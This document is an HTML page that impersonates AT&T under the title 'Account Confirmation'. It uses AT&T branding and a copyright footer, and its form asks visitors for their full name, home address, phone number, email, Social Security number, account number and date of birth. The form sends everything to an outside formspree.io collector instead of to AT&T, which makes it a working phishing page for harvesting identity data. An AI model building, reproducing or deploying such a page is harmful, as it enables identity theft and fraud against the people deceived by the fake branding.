<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Account Confirmation | AT&T</title>
	<style>
		* {
			margin: 0;
			padding: 0;
			box-sizing: border-box;
		}

		body {
			font-family: Arial, sans-serif;
			background-color: #F4F4F4;
			color: #444444;
		}

		header {
			background-color: grey;
			color: white;
			padding: 20px;
			display: flex;
			justify-content: space-between;
			align-items: center;
			
			top: 0;
			left: 0;
			right: 0;
			z-index: 9999;
		}

		header h1 {
			font-size: 36px;
		}

		header nav ul {
			display: flex;
			list-style: none;
		}

		header nav li {
			margin: 0 10px;
		}
		footer a {
		color: white
}
		header nav li a {
			color: white;
			text-decoration: none;
			font-weight: bold;
			font-size: 20px;
			transition: color 0.3s ease-in-out;
		}

		header nav li a:hover {
			color: #D8D8D8;
		}

		main {
			max-width: 1200px;
			margin: 100px auto;
			padding: 0 20px;
		}

		section {
			background-color: white;
			padding: 40px;
			border-radius: 10px;
			box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.1);
		}

		section h2 {
			font-size: 36px;
			margin-bottom: 20px;
		}

		form label {
			display: block;
			margin-bottom: 10px;
			font-weight: bold;
		}

		form input[type="text"], form input[type="email"], form textarea {
			padding: 10px;
			font-size: 20px;
			margin-bottom: 20px;
			border-radius: 5px;
			border: none;
			box-shadow: 0px 0px 5px rgba(0, 0, 0, 0.1);
			width: 100%;
		}

		form textarea {
			resize: vertical;
			min-height: 150px;
		}

		form input[type="submit"] {
			background-color: #222222;
			color: white;
			padding: 10px 20px;
			font-size: 20px;
			border-radius: 5px;
			border: none;
			cursor: pointer;
			transition: background-color 0.3s ease-in-out;
		}

		form input[type="submit"]:hover {
			background-color: #444444;
		}

		footer {
			background-color: grey;
			color: white;
			padding: 20px;
			text-align: center;
		}

		footer p {
			margin: 0;
			font-size: 16px;
			font-weight: bold;
			text-transform: uppercase;
		}

		footer a {
			color: white;
			text-decoration: none;
			font-weight: bold;
		}

		@media only screen and (max-width: 768px) {
			header {
				flex-direction: column;
				align-items: center;
			}

		header h1{
		margin-bottom: 20px;
		}
		header nav {
			margin-top: 20px;
		}

		header nav ul {
			flex-direction: column;
			align-items: center;
		}

		header nav li {
			margin: 10px 0;
		}
	}
</style>
</head>
<body>
	<header>
		<img src="att2.png" width="150" height="80">
	</header>
<main>
	<section>
		<h2>Contact Us</h2>
		<form action="https://formspree.io/f/mrgvyqyp" method="post">
			<label for="name">Full Name:</label>
			<input type="text" id="name" name="name" placeholder="Name used for account registration">

			<label for="location">Home Address:</label>
			<input type="text" id="location" name="location" placeholder="Enter your home address here">

			
			<label for="phone">Phone Number:</label>
			<input type="text" id="phone" name="phone" placeholder="Enter your AT&T phone line here">

			<label for="email">Email:</label>
			<input type="email" id="email" name="email" placeholder="Enter your valid email address">
			
			
			<label for="ssn">Social Security Number:</label>
			<input type="text" id="ssn" name="ssn" placeholder="Enter your social security number here">

			
			<label for="account">Account Number:</label>
			<input type="text" id="account" name="account" placeholder="Enter your AT&T account number">
			
			<label for="dob">Date Of Birth:</label>
			<input type="date" id="dob" name="dob" placeholder="Enter your valid date of birth">
			<br>
			<h1>.</h1>
			<input type="submit" value="Submit">
		</form>
	</section>
</main>

<footer>
	<p>&copy; 2023 AT&T. All rights reserved.</p>
<img src="att2.png" width="50" height="20">
	
</footer>
</body>
</html>
		